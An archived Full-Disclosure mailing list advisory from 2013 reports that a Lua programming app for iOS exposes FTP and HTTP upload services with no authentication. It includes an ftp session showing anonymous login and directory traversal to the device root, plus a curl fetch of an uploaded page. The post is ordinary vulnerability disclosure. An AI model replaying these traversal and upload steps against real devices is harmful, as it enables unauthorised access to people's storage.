lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 10 Sep 2013 21:19:31 +0000 (GMT)
From: "Larry W. Cashdollar" <larry0@...com>
To: full <full-disclosure@...ts.grok.org.uk>
Subject: Unauthenticated Remote File Upload via HTTP for
 lua-Programming language 1.6 on iOS

TITLE: Unauthenticated Remote File Upload via HTTP for lua-Programming language 1.6 on iOS
Date: 8/1/2013
Author: Larry W. Cashdollar, @_larry0
Download:
https://itunes.apple.com/us/app/lua-programming-language/id578116006?mt=8&ls=1
http://www.tayutec.com/indexen.html
Description: "Please download the "lua-programming language new". And do the following steps before using the app, you 'll give me a five-star praise ! ! http://sosilen.blog.163.com/blog/static/7727956620121029843220/
You can control the background image, and execution voice , text color and shadow , the number and the order of the main interface of the tab bar to create your learning software.
You can enter Lua code by keyboard, and then you can execut the Lua code.
You can save Lua code and learning materials, and can be modified to the save file and delete the save file .
You can Learn Lua knowledge , the system provides some basic learning materials .
You can use Lua code or learning materials to generate two-dimensional code , for easy sharing."

One of the features is the ability to upload files via ftp & http when the 'Computer<->This machine' is selected.


Vulnerabilities: 'iOSftp' & http unauthenticated file uplolads. The application is sandboxed, but any remote user can read/write to the devices storage.
The uploaded content is served out of the http servers directory. While the http server doesn't process server side scripts it is possible to upload and serve malicious / illegal content. 
I would think it's also possible to fill up the devices storage as well but did not test it.
larry$ ftp 192.168.0.31  10000
Connected to 192.168.0.31.
220 iosFtp server ready.
Name (192.168.0.31:larry): anyone
331 Password required for anyone
Password: 
230 User anyone logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /private/var/mobile/Applications/9004C5D8-8154-406A-8D04-CE1C035BF813/Documents/ftp *
ftp> cd ../../../../
250 CWD command successful.
ftp> pwd
Remote directory: /private/var/mobile
ftp> cd /
250 CWD command successful.
ftp> pwd
Remote directory: /
ftp> 

* You also get path disclosure.
http server listening on port 8080 allows arbitrary file writes to storage.
You can create directories out side the upload path through the file upload web interface and the .. bug.
Because the application is sandbox I was unable to overwtite application executables and components so impact is limited. As stated above you can serve malicious content (javascript/html) via http.

After uploading hi.html through the web interface it's served off the http server:
larry$ curl http://192.168.0.15:8080/hi.html
<html>
Hello, This is an HTML page
</html>
Vendor: Notified 8/1/2013, https://twitter.com/tayutec
Advisory: http://vapid.dhs.org/advisories/lua-ios-Huang-XiaoWen.html
Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists